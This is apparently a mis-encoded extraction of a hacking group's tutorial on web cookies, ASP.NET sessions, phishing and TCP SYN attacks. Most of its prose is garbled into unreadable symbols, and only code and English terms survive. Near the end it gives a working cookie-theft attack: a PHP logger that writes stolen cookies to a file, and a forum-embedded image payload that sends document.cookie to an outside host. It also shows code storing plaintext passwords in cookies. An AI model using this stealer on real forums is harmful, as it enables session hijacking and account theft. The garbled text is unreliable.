Cookiesjournal
- 3. ! ! " # $ %& $'()*+ $,-. /$01"2
%& 3 $0 " # 4%!('. $ )$+56 %& 7 & 0 0 !8
" -. ! %!('. $0- 7 '+7 $ )9 !: - .- &
& ) ;%& 3 0 $+56<
= 0> 0 ? )6 @; %& 7 1 A0$+56 *+ " %!('.
-.B
=0
The Cookie, Microsoft , The Hacker's Choice
- 4. &81 $0
$&5
? C 0 - .D " - ' $0EF " & ! " G
H; & !?!&I'B$0 C 0 - .D )& %! JK
('? ?L+M H:0 '0 M " !8 K ! &8$H
& ; %('.B
'G N O PG *+Q ! 3 J & & !"0$ - .1; 5
RTextSOT & ) O P6 $0& % 8A; U ? 0
& % 8A&+P !O P6Temporary Internet Files+U7 - ' !
&+P !V M. - !Cashe;&Q? $W7 " !-.
-. 1 $0 & &+P ! +U7 - 'B
X. 0D & & ? $W7 !; ! !! " (,'W
RWeb BrowsersS? 0 1& & D W' $ & ! M 6
6M; & EIP 4 $ Y !& % 8A; U
! $0O M I0" & 0& ' ' ' ? - . I0-.
T - . # !; 3 Z $. 6' !& ' !$ D W' & 1
D # !$ ? FW ;K " ,T ? ? ! ,T -3 .O
& %!('. & '& %!!1[ - .B
PY $' & ?L+M 6 $0- 7 Y 8 7 ] )%& Q *,4^
H &8 _ .X # ? 0" 8 0-. - ; ? !%& $
- ? $ 6' !4 ,3 %& %!('. ? ?L+M? 0 H Z0$0
%JW;0 0 Y F8 %& O& ; 8 0?Z $ 0
!"&B
EIP 'TRActive contentsSRCookiesS` P! $,; "
& 0 ]B
0 $0$H O0Q? O7 'a ZP K $0 - .D *,4 !
D ) ? 0 $ 0? b3 0$ H -U M. " - .6HZ
!!) %!('. ]!B? ![Drop-downMP )? -MP1[
]D $T(Y G ! ('& 0 $ "6 ! H $ ;B-U M. X 6
$0$^EIP 'T^; X ? 0 $0*,4 ]& %& c I
- 5. KO& ] 0 U ? 0D W ? & ? 3 J -Q.
%&&B
- .D G d. $ -. O PG '()$ ? ;e( ? 0
3 J O & G ! ) Q; U ? 0 3 J
O ? & & %! ! - . # !; $ & 0f !#f. 6(,% ;
FW 3 Jf# !$ T(Y & 6 @;
O & %!!1[ - .DZ & !"0 & %& & !"0? G +G ,!&I
& dgB3 J & 'h)"0- . # $0$ &I0$IP! & G ; - .$06
$ ;& ? !!8 3 J ? M ! ! " & 0$' ! J8$0 ;
i -. - . # !; & 6 C2*, 6 " 0? 1Welcome
Back$0 E 3 $06 %!!1[ - . # !$ ;K e(
$T(Y ! Y F8My MSN! %B$' ! J8$0& 0$ ? $'M
& %! ! ; $ 3 J " & d5P- .D $ -. 6 & 0
'h0$& %!('.D # & %!M ! - . # ! !8O ? )
; U 3 J .$0 ! # -.!$0 ; O ? & ;- .
&0 -.!B![ !8$ & d5P - .D $M :!!
? ." & ; & W0& %!& %!('. !B" $ 'Q
$0> 0 E !$0- .D # & & !"01! 0? 0- .D G
& %!('. # " ! Y ! !) !8RB$0$ 0 "0$'+
& %!!1[ $ ;KS
- 6. jk%!'. P 3 J " MN aW0D d. %&!% 8A? 0 .
! %& 8% 0!]) # l J" &I0& '0 -. )B% 8A?'!
D $M ? 0%&# %& & !"0% 0! FWh 3 J ]- .G .
D-. & ( ]& &0m 8- .B? ' ! !$ ! ! ' O P- P
0% 8A ) $0>!-. E ! ) $ : ! !
$KPRAMQ! )B3 J 6D " 0 $ : &- .
! % 8A !! !]& n 8 Y 8B? 0 ; 70 Z0
6' & :state& '7 D ?Bstate0G $00 0 ? 0$
% T F0! !% ?B]E ? 0 0 Q" %!('. ? 0;
" - ,0&Bh - ,0$ : ](." !& 8%" ]& !
; $,5$,. E 7 F 4 !]& 0 Q! $ -P& !
# $8 & ! %" 6 ;B6' & : ? 0- ,0[ !-55 !state
-. QE 7 ; 60BHTTP- ,0Q &0OM Gstate-.B$0
5, 0 %& h 6+ I0 .d. - .G %& h 0 $ I 6
!BN$; .$ I 6 $0o P-. 8 ! " &I0 Z]&
& !"0G $M :!!)p Wh 5 J $0 .$0%& # ? #! ? 0%&B
1[ 6& !B
d5PD $0&& !- . " Q ; # $ & :0 .
%!; 3 J &R% ; G0S& !- ." $ &I0$ !
D !8" && !)0 # $0 .B'h0) " $ :
n 860" &&B" ? :!X! )& I0
Q0; !! ? # & !q 5 $ & !&B
)&p Wh 0 0 G ?!:0 !3 ? )! ? 0&1: ? !
! ) Q%!('. ! - .G $0!&[ $IBO $M ! ! 3 J
. 0 T(Y $N$0 & '7 [D G C2? ,P !& "! .
- 7. ! !'P ? )! ? 0&]& ) Q%!('. ! 0 ?!:0
'.# #&B
D ' ! '+ ('.ASP.NET UnleashedaW0?&'0 !$ :
& )^OMHTTP; Q .D '8 ! M 9& !
& & -. 8 !& !p Wh # G ; $0& '0$ %& !Y ? ) ; "
-. %& # ? :! ) " %!'. P ,Q-. 8 !B$0- 6 "HTTP
? & -(YRStatelessS& &B$ '. 8 ! .D K $ 5"
-. %& E. & & ? 0 c J" -. %& !Y $T(Y G -P !? 0^B
# = Q J$068 $ -7 ?ZN<'Q0 3 J 8
&0 h $0$T(Y !R& 8& .] 3 $;,]? 0 $. O Q"
SBBB"6 !D 8 70? " M d( # - Ig '0& 0$
" %!('.& 0B
06+Netscape1 . 7 r & $0 !0 $0!8 ) !
DRW3CS" ) %" -P / # Z'h
&B$+ & '7 . 0Netscape" 'h0 ;[ & '; G ]s
) $T(Y 6'700 & 0$' !- 0," Z& 60B$'+
& :' $ & '7Expires-. %&h K #B
]& K ' 6 )& ;H! %& Q0B# t
- Y 8 !$ WExpires%! K&B0& $ )
%u O P& N? !&O P # $0"& !$ & 0?
O Po 'M !& ) ! ?B? & l J"HTTP60
& [0 . )B& " %!('. 0 .Set CookieG
-. 8 ! ! %! ![ & &&I0?! %!'. P .$0 6 ?B
& & v G 6' ? 0HttpCookie# $0 $' G &5 & "70
& !m F'8R- Y 8$0Value#S&'_U.SRAdd!
Response.Cookies& W0 PB&5& 6 @; ;Expires$0
& ! i &5G? 0q 5 "& 0%! 6B
$ & 0$' !$ & 0$' !5d5P? 0 & % 8A ?
! :! !56'& O& $' G $0 # & 0B
%!('. %T ? )! ? 0& 6& 0 *. 70
- 8. Using System.Web;
//6'
Response.Cookies["BackgroundColor"].Value = "Red";
//& 8
Response.Write(Request.Cookies["BackgroundColor"].Value);
; ' O2!$0d5P&& 0%& # $ !G " $ & W0B
" ; -. 6M; 6 @;$0!8 ! '# & N$ & 0$' !
& 0 " ! 6 ? 0E G ]& ? & :
HttpCookieCollection cookies = Request.Cookies;
for (int n = 0; n < cookies.Count; n++) {
HttpCookie cookie = cookies[n];
Response.Write("<hr/>Name: <b>" + cookie.Name + "</b><br
/>");
Response.Write("Expiry: " + cookie.Expires + "<br />");
Response.Write("Address1: " + cookie.Address1+ "<br />");
Response.Write("Address2: " + cookie.Address2+ "<br />");
Response.Write("City: " + cookie.City+ "<br />");
Response.Write("Zip: " + cookie.Zip+ "<br />");
}
% 0!E G0"$0 ! ?VB.NET
If Request.Form("savecookie") = "Yes" and ValidLogin = "Yes"
Then
Response.Cookies("member")("username") =
Request.Form("username")
- 9. Response.Cookies("member")("password") =
Request.Form("password")
Response.Cookies("member").Expires = DATE + 365
End if
$'Ph Y F8" I0 "E &a ;& !
Domain$ !& 6 I %!&T $ ?.
Path$0*7' 7.
Secure
0 # & 6 I$ +0 &5G ? d5P&
E. %& Z EFt$ !!)
HasKeys
G $0> 0 # $ & 6 I$ +0 &5
-. ? hM!t$<
D ) $0$'70; '7.? (,'W ? M ! )& ?
$W7%!('. $ # " ?A]&% 8&B-1; V M.?
1 $0 ,P ! o )&cookies.txt? ' ! ! ; U ?
-% 8AV M.&Ba "06' :h G 0 O P6 &
; $ &$@ N & w ]& & : & 8& 8"
1; -.!& w O P]& m 8B- ',U7?
% 8A$)& ? ,P ! )&$ '.$ !1 0 1 d. &
? /: ]-. %!'. P&BE ? 0john@Bermen.txtB6
? ' ! !/Windows/cookies/Windows/profiles/cookies
% 8A&B6 " 1& &; $& w ]& 8B
- 10. %& # [ " & 0 & "0 ,P6 && ! 3 J $N &BE ? 0
$@#G 'T & 0IE& '7B
WEBTRENDS_ID
129.1.129.58-1041789995.121030
www.br-security.com/
1024
3872737152
30271763
3731731632
29537508
*
O P6abhishek@www.br-security.txtRabhishek!P$.
-. - .$0%& !S-. %& %&B(,'W 3 J -. 6M;
& 0$' !0!-. (' $0$'70$B6 !IPZ !P
R129.1.129.58S-. %& % 8AB& HZ $0 & ! &FQ[ !B
- 11. ! "#$
" %!('. G$. 3 ;, % 8A? 0D ? 0?? '.
-. m 8B8A? 06 @;%!('. Z 6"4# T(Y ! 0 ? '+ %
&B" 3 J 6 % 8A? 0; U ! " ? &5 -+ 6 !
g 5 )!B
D # $0$ " ]l J6&0! - .. 0; ) &&
6 Ia " ? '+ # & 0$%&RS8 & !p Wh . # ? 0B
$0]D $T(Y ? 0; ?g 5 0% ; ) ]& 0 )
D! & 8E. .B- -P. M" V M.![ ? 0
D ? FW 6"4# T(Y%!('. h '.&B
%!('.E ;I ?%!('. " # JW0 ' $? ;'7.O &
FW ]6 # o (.D ? )! '.?".'.!B
& ! IPBFW%!('. 6 & ( " M - . ?".?
-.B- . ! ?!P]E ? 0MSNR'MyYahooS!
;& 0 ? [ 8 & 8BD W' 6 %" !P$0- .6& !B"
&I0$06R5 $M "!S$0 'Q ? [ 8 p W 6
- .MSNOF'; ]!& 0B%& !2 ;'D I0 !$ &'.
. " %!('. 0$ :! %L /) $3 -T 0W' ]&j
o 0$' ! JW0&I0$IP!k! !!B$;, $. & % 8A0 63
7 ] U ? G !;!B
Y F8 $0x I I0 # )& & !"0 I0? 0& &
D& $ '.? )! - .G ? h'+IP&BG ; 6&
_ . 3 J $.$0 8 &0 & 00-3 70 ['7 ! ?
& !)0 !8 ,YB& '7 70- .!&[ J? 0 #B& )
# & &0! !" - .200!"0a'." y,'W (%! &!PG d5P &R
0S$'. 0200$;!$reloadRrefreshS-. %! D W'B
- 12. R$ ! : Y 6 -. z, ? 0$ ? - ." I0!{0 (
& M & ,1 & 0 0G ? D 'S
M & !Z ? :!? !0# "0 - +IP? )! M
-.B
progenicd. $ -. ;'7.Progenic Corporation-. %& ![
%!('. D " $ ?! PO P)# & ![ &0*. '? [ ?
$Q3& $H # $0B? 'h?progenicD'7 '.&FQ$ &
& ! h &8 z,Bq 3 . z, ? 0 0Z $M 6 3
!BD3 $ - .. '8 ! ![ !8 z, !
progenicQ& !B'.6 " M $0 0 G $ :G ]!
!Z '. . " )#HTML! !! 0 $0%& $HB0 0
$H 0 $0 (' )# ]$T(Y !&[ ? /) 0!B6 0 K "
-7 $M+ !]& & ( i, . 0 i,B? 0 $ :
.$0 06+ ? 0progenicOF'? 0 G .]!#
![ )! !0 !'M $FWh % ; G $ &B" &I0$0 # "
D " M $0 0 $3 ? '.progenicOF'$0 / % ; ]!
E. .%!!p Wh 0 !!BX J 6' ! "- /)0
%! & !"0 0 $ '.". '8 ! 0 lH3 " ,P ]-.
Q! )B.]O P 6 6' !0progenic'h0$ i, &
& D W' -. 0 K !B% I0!!? 0 3 J 6 " &
, | Z 0 O P & 3 $0*. ! 8"0& %!('. h iB
d. # & ;(0$M ? 0progenic%& ? )!]$ &) ?
6 $0$ ?ZN # & 0 & T' !8
Ad.progenic.com FALSE / FALSE 942195440 IAA d2bbd5!
8 ! !!B
- 13. % "#
}& '7 $'.!
&'Sessioncookie()*+, -$.
}BPresistentcookie(/0, -$.
1'Unsatisfactory cookies($.
Session cookiePY X 6^" $ "%!('. )
%!;% 8A 3 J ]!!)0" 3 J ) 6'70" _6
!Bm F8 !1"2 7 $H ] X 6 ? ) M0" c&
-. !&I' T(Y 60-B^m 8$T(Y G %& h p Wh
$T(Y G 0d ? %!!m F8 ! 3 J ? & :B
PresistentcookieU ? 0 3 J X 6% 8A;
& ;BP; 0d FW 3 J ? & : M * 6&0
!!)Bm 8 " & G " X 6 ? 0 ) !
!;p WhR& ( ;3SBU $0 0'.! M G $ Y !
& ]& ; & ;FW 3 J $0` P? O P 'T %& h 0
& ; . '.!;B
Unsatisfactory cookiesY F8 3 J $0 . '.!%" 6
! 'h0 6 " & !; " & . &0% !%!('. ? 0 ;
6 - . ' ' ? & 8RSSLS~Q%!('. !& )B
p W ?E<O05 !p W ?b+|p W G" E
Dh '.%!'. P # $0 ! )# %& h E ! " # !$ !
& '7B6%!('. ; ? '+ & 3 J % 8A? 02 ;I
&Bb+|p W GD "# %& h E !$@# 0 (' - .
h & '7%!'. P # $0 ! )!BDp W ? '.2 ;I b+|
D ? 'T$H ]& '7 %& h E !$ '.&B]E ? 0
D i, " '. ? 70p W ? '.%!('. b+|D # &.'
& %!('. " -. 6M;B0! " X 6 ? 0E ;I %!('. G
- 14. $T(Y " %!('.-. 0 "0&Y 5 . i, ? 0; DBX 6
& 0 )& -Q &B" 3I0$ & '7
& 8 ?%&&B. '.!%" -. 6M; $ & '7
O0QFW 3 J $0P]; %" &0$ |c & ? 0 ; .
&B
/23
0 $0$H O0Q? O7 'a ZP K $0 - .D *,4 !
$ H -U M. " - .6HZD ) ? 0 $ 0? b3 0
!!) %!('. ]!B? ![Drop-downMP )? -MP1[
& 0 $ "6 ! H $ ;]D $T(Y G ! ('B-U M. X 6
$0$^EIP 'T^X ? 0 $0*,4 ]& %& c I;
KO& ] 0 U ? 0D W ? & ? 3 J -Q.
& %&B
•4"5 06-U M. ? 0"6 '+&'" M -U M.
-. D ! 7!!) %!('. # " - .D !$R B
VBscript,ECMAScriptJscriptH $ ;$ "6 ! :!
& 0B S! )!.]*. !M,;3 ] $'. 8" I. y J6
" %!('. o '7)O2!$,; " ZP1 . 0 .# * %!('.
& 0 D ! 7 -U M. ? 0"B? O7 '" Z ;
-U M. ? 0"d. %& $HD W c & $0O K $0 7
& ; %!('. !8B^- T 0$ E &' ; " M
$06•; - .D G " 0 - & ]! / Y -U M.
$01&Q # !$ -. D W - .D Gdownload
) 0 FW 3 J ? # =;!!B
•75 /" 006 89? E ' ? -,
_M '%& 5'7 ; U ? 0$ & 0 H $ 0
; ) ? 0$M l J"download& !)BY !
$ 0$ : $RY F8^_M ' ? E 'Sd.;
; U ? 0 ,;3 $ ) 1[ M ]& !)- & - &
- !& 8!B2 ;I ? -,^q !&T dT G !
& !)B![ dT *. ; 1&3 Y ! $ 0" X 6
- 15. ; X K $0 . ? -Y P]%&P ; ? 0
& ;B
% ; ]_M ' ? E ' ? -,]-U M. " %!('.
& 0 ;w 8B$0` P M $ ! -Q!X g 6 $0-7 0 +
& %& O& ] ; d. ; X ? 0 H Z0B!? :h K $0
m F8-. %& 0a ) !?!&I' M ]EIP 'T
; € .G ! ? ' $ 0 K # " %!('. 0$
!;![ *.BK $0!8 ) ; * g a ZP " ;0
! Y 8? - !&T -. 6M; ]EIP 'T 0! 8 08 0m F8
!!)![ ] - . 8 0d. %& $H ? )uBG " $ Y !
-7 0 ]! & ! P -8 # $0- 7 $ & H; & !- .D
!!1[ EIP 'T !;EIP 4m F8 !1"2? :hB& &
$ 0$ '& Z 0h& 0 M 'M+-7 ?B" ?!"!&I
a ; K $0 ) $0h ? $ 0" M 'M+-7 ? $ 0
HTML& ; %!('.B$ m F8 !EIP 'T & & M 6 00
& 0$' !! & Z M 'M+?B!1"2? :h K $0
F81 & & X 6 m%& h ] +;I 6' Y $0
!;B
$ 70 ($0$ 0$07,RSessionsS6 ? 0& '7
M # 7, 0 ; ; X g<
86(Sessions.
Sessions-7N' '7.$0$ ?! P!&I 1& & a ; & '7 OF
& !P d. %& "0? ,P!&IO # ? ';7Q" G $M 6;g
& ? M0 EF "B? $7, $0 ' -;7Q6 !REFSG
!! 0RD W' ? 1 ? ! -. G , 0Close SessionS
OQ-. '0E. %& ! &h 1i G 0 ? 0 6 1[ "?
1ComputerManagement%! -. G ,All Tasks•Send
Console MessageB0 - ? )! ? 0- !w P
1 $0D 8 M G $' /:Session StateQ '8 !-. %!!B
$T(Y 06+ 0 'Q x Pa J$0%& $'8.- .D G " ?
- 16. 0ASP.NET1 $0$7, G & -. 8 !ASP.NET_SessionID
!h E. ) $0 %& $'8.B6 0ASP.NET? : $0 !Q
8 ! !& ' %& 0-.?&I0?& .B
! . 6 0ASP.NET1 $0q GSession$ -. %& %!! Q
& %!('. 0 $0> 0 3 J ? & : ? 0 # " & 'BE ? 0
1 0'# G " '.!MyItem%! ![Hello& & - 7 # $0
Session("MyItem")="Hello!"
0 1:Session& $ " M $0& 0
{BSession!& 0 ) )}‚-. 8 ! ." $5Q!
! 60" & MB
}BSession" & 0Session-. 0 $50B
ƒB!Sessionc 8 0% 8A v!B
v ? &' Y F8" I0 "E &Session& & a ;
:
Remove! wSession
RemoveAll1; ! wSession
SessionIDID& !: 0 ,IP$7, !P$0 FT.
AbandonSession& & $;8 ,IPB'.!" _ 0 )
& & $T(Y G -. 8 !` P!& & 0 3 $0&
! $'P) K.
TimeOut$7, '8x Pa -, iB?!&3 - Y F86
&Q ; " &I0& 0$$0 '. 8 ! 0 )$5Q!
&'. ( .Session'8!.
!5O Pl J"web.configZ!! i $7, '8-,
<configuration>
<system.web>
- 17. <sessionstate timeout="60" />
</system.web>
</configuration>
Event$7, =Q& '7 ! !Session_StartSession_EndB$
Session_Start"4# $7, $ & ! „ 'QSession_End„ 'Q
& & $;8$7, $ & !B6EventO P !& 0Global.asaxy I
!B
& !& 8 !& 6 " ,;3 E G " !
<html>
<head>
<title>SessionCount.aspx</title>
<Script Runat="Server">
Sub Page_Load()
lblSessionCount.Text = Application("SessionCount")
End Sub
</Script>
</head>
<body>
Current Sessions:
<asp:Label ID="lblSessionCount" Runat="Server" />
</body>
</html>
Default.aspx
<Script Runat="Server">
Sub Session_Start()
If Application("SessionCount") Is Nothing Then
Application("SessionCount") = 0
End If
- 18. Application("SessionCount") += 1
End Sub
Sub Session_End()
Application("SessionCount") -= 1
End Sub
</Script>
Global.asax
!5? & : ? 0 , 0Session!ASP.NET! !! o $.
$. !RIn ProcessS!% 8A "& _ . !% 8A]SQL
ServerB
Session'# 1; ! - & $. O8! !x Pa J$0$
!Session! ".& % 8A .D $. ;B6 ';
&'(0 " .O+! $0 )$ -. 6 o 6 OMhWeb
Application%!!1;]! ? M'.!d70 :!c J" ! 60"
& !&T - . ! ? /- /)w ' $0 # ;B
('. 0%!!%: !% 8AG M " %!SQL ServerY ! '
! e( 3 J Z . !'P "B!? g ? y ISQL
Server%!!- & K $0O P90? 0$7, ?InstallSqlState.sql
! ) YBO P& 0 6 " &I0web.configi "OM $0Z
!!
<configuration>
<system.web>
<sessionstate
mode="SqlServer"
sqlConnectionString="Server=127.0.0.1;UID=sa;Pwd=YourPassw
ord" />
</system.web>
</configuration>
- 19. ; 2 0 <
,8 $N )"]& !?&0 F? !0 $ & !
& !Z 08B! P" ? 70Z0 # "& & -. !“!0
C Z0”R-. # 'P E;3 0 … % ; $ 7S& !B-,I0 I0
& 0!d.& !6…q. # $0]BX 6 $ & &0& 0! P6
? )!G M d. &" ]! )1[ Z :!?|O+&0
o .$0- 7 # 'h0%!('.!B:!& & -. !$ # ? 0
$N- ' !& &0. '.1& $0 &6 ]& "-. ".$+7B
@; 1!! # "]& & -. !”D#% "”& !B
$W7 $M :1[ $ ;K 0& '0 & 0$' ! ) & & ?
! ! h 9 &0 # F 4 !]& =, # ! " & !
;&B_ .& !1[ Y 8? 0 X J &0&R&
i, E;3 ? 0 '!! Qc&BS
lH3 G !Z %& # !$ -7 & 8 X g 6 $0 ! MPE 0
! o P] & -. !$ 7 ? 0-. 6M; Y F8B: 6
,Y * 3-.B-7 6M; IP l J" !! Q 5
! & : ?B6 @;;" ]& ! $&Y ; ! $0&
$ ? :! & $ ? F ]& !!8! ? $@#B
# $0; $@# d5P& ]& )&BD ! 3 J ; )E 0'.
-P)& 8 Q G ! ! •; ]& !B?[0%& # ? Z:
]& M O ZN$; -. 6M; $N ) ! $'P /"0o 4# 0& 0
!0& 860" : " I0B
M ! 8 0 !- ?!"!" %!('. 0R% ; $0
& 0 -Q.$0 0 3 JB
- 20. Phishingt-7N
-. %& J ; - 6& !"!? 0$ -. * P" 3B$, G !
X "phishing? % ; & 3 J & I. . * .# !PG ]
? '3!!$0; ! &3 5' 0 ; FW 3 J . 3 ;,
! # -.&064 !? 3!-T 3 J 6Bl J" †2 ;I ; X 6
? %[ $ "pop-up& #B
Phishingt& $ :N
* PGphishing, $ a & &0 0 G d.E. %& PO;
" c I ? '.D " $ &. K0$M 0! "4# ]&
]& '7 ; !;'3 ! $ ? - .; G 0 ? '3 - &
& #B&5# ]! E. ; ? 0 O; l J" $ '.D O;
K0 ;.Q$ & . 06 $0 1! " ? 70$ & .
& '7B6 ?g 5$0*,4 0!"! P]& '7 IQ O; 6 $ 06 0
FW 3 J . 3 ;,]? '3 ? % ; 0 O;
& ! .B
O3 G<,I O; G ! M +$ &. K0$ : $ & ! Q
%[ G ' ,5- .$0 ; =Q ! ]-. IQ - .D $0G +
pop-up&. K0 ,Y - .& †5Q!$ !0BD *,4 U6
? - .spoofed& %&B- .D 6 " M !; $M "
pop-up! ? 'h0 FW 3 J ' $ )# -. 6M; & '7 ,5?
& 8E. ]-. %! -. ! ,5- .6 $ FW $0†;5'7 $ &
&BG ? 0g 5 2 & 8? 0 3 J 6 " & =Q # p W 6
- -Q. & & ? '3& 1&Q ;B
- 21. !#= #" >?
' 8 I0b3 0&B$ ?! P d. &
$'70! 3 J ?b3 0 & %!('. Q8 4c & ? 0&
D $0"[ 4 . '.!- .a& "[ 4?R B'7.G]!
1 $ -. ? UZP$'701; &?TCP/IP!
n 8. 0 %&&S
D )& !['.h'.$0 '0 . '.! M & ".
%!('. . 0a :!X ! ]& P&B#M " & 0
6M; OQ& $0 8 & J? J '7. & 0=, 6 X Q
& . 0B
D %& ![ $ ! !! ! & N- .& !1[ &
{B$ ! 6•;& !0! Y F8 3 J 6 ';B
}B!$'P) Q 7 3 J $ ! 6•;? :Z $h;
!R B$. Z) Z)6' F0& 3 ;,
Z& % 8A %!('. %&hS
- 22. ƒB& Z OB
"[ ] " %& %!('. !P$M & ? 0 P 3 J & 0
& 0 !]-. # " %!('. $0B. 'h0%!('. ? '" 3 J ] " %&
‡T+Z&
ˆ!P$0%" !!? 01"2 3 J
ˆ-3 .
ˆ !#IPD %& %!('.
ˆq 5
ˆ&MACRMessage Authenticity CheckS
!# !! QIP! $ -. K 6 $0 !# $ ! & Y
IP% 8A !# 0 . !%&IP& 0 7M %& '. P )B
!&T G " %!('. " & q 5&MAC6;$ &
-. %&h i N!B
&MAC$' G !%!!? &,P" 4!$' G O(W
$Pg # $0$ -.!B& 3 J14! !&[ _U. !!
& % 0!!BQ %!! ! $['! )B
0 .$0 $ :]!8 .]!!)MAC& +0 &
MAC$7 5 !!&Bh ]!0 7M Y !i 1&3 $
-.BRG ' $ & # ! $0?& & ? ZP1 "6' /)0& N
; !!1[ ' ? 70? ZP1 6 0& x 3 & ' &
0 ZP1 6 !0 " ?! 70? $M E L !$ J
!!‰S
- 23. #
0 %T %" & & ? ); $0Š& !&
? !! Q" OQ; $0$ & !1[ ? J !8 ) ;K
! %!! 8 UR BM 6 ; $0 6!! Q%" $ & !
8 & &0S@; Š61; ! ? , !8 ) d. &
& :0B
0! 8 0%T K M ,U7 - ' !E I0"
! !! '.O $'P)p Wh ? '.B%T " 'h06'P X J ? 0
0& $I+ !8 ) ?;
- 24. " %!('. 0A(
?SYN
iJ$,3 & & X P!GSYN «?SYN»-.B? !SYN]
+ % ; ]> c J(Sequence Number)! ! o!8B$0 . !
GSYN![ > " m FW + % ; G ]%& =Q $,; ! '7.]
G $ &«k" I0 & o P ZN$; _U. -.
& n 8$KPR('. % / E! G ?'M %& p Wh I0%!
!BS> ! !& †&I06 00]! !0 ! 1"2 3 J
G " $'70$ :!%& o P 3 J †!&[ ]& # +.>
& ![ > !.
?RST
? ? 0 Z:SYN0-. 6M; ]-.O 3 '7."& ?
‹Œ& ![ OMh ]& ! QE P-h $B$0 / o-. * 6
G .$ACK/SYN& E. - $0%'BG & 0-$'70
RST-. %' ?ZN$ & :0 .$0 & & +B.]1: 6 !
-. 'I - $ &;P& 8 IJ 0 - # " ?! >
-P /.
? $'h(stack)?TCP? iJ |•" 6'. K;0SYN&
& ? M'.!Bq 5 "6'. E 6 E ;I(timeout)-. 6 " OQ
$& !"# > G $0%& %!!p FW ? P]$'hBM= Q :!G
" I0-. 0W' F0 J.
& 0 Ž @ A(? 0 " %!('. ? " MB
O 6 ? 0{Œ& &01[ -Q!0
- 25. {f•# •$•‘ [ Ž '. D • ’ -php script& •![ $• .
com.35t.www
}f1 0 %!•‘U•& !0 "6'script.php& •% 8A
“fh”,'a"txt.munch("fopen•–S—
$HTTP_REFERER"$fh,(fputsS^—
n"$file,(fputsS^—
$fh(fcloseS—
•˜
ƒf1 0 E8‘'O P•munch.txt& •!,#
sf• $02 D 8forum? & $•& 0HTML• $o&I0 .
& /0o "&• & •"0& &
™Rimg src^”
javascript:void(window.location('http://SITENAME.t35.com/script
.phpš˜HTTP_REFERER='+document.cookieS›^ SS
? - 3 ? $0 /›™'MN ')Z0? - 3 & 0& ! Q
Œf$02munch.txt& •%& h ! 7 " & 0B
& . $0 $+56 D 8œ
: $,; G d5P "01 !-. ! %.% + '7 %.% 6B
;$0 !$h; C Z0 M G $M + '7 M 6 -()6
-. !1 !
- 29. ©CopyRight®
Author: Satanic Soulful
E-Mail: Satanic.Soulful@GMail.Com
Satanic_Soulful@Yahoo.Com
Developed In:Satanic Digital Network Security ™
Special TNX 2 :Hell Hacker – Collector – S_hahroo_Z
Research By:5/-t4N1C
©®Copyright For : Satanic Team 2005-2006
For More Information Go to Http://Hack-er.cjb.net/
©®All Right Reserved For Shabgard Security •
Mr.XShabgardX
2005-2006 For More Information
Visit:Http://Shabgard.Org
My Deram Is All Day For Girl Is Dark&Ominous@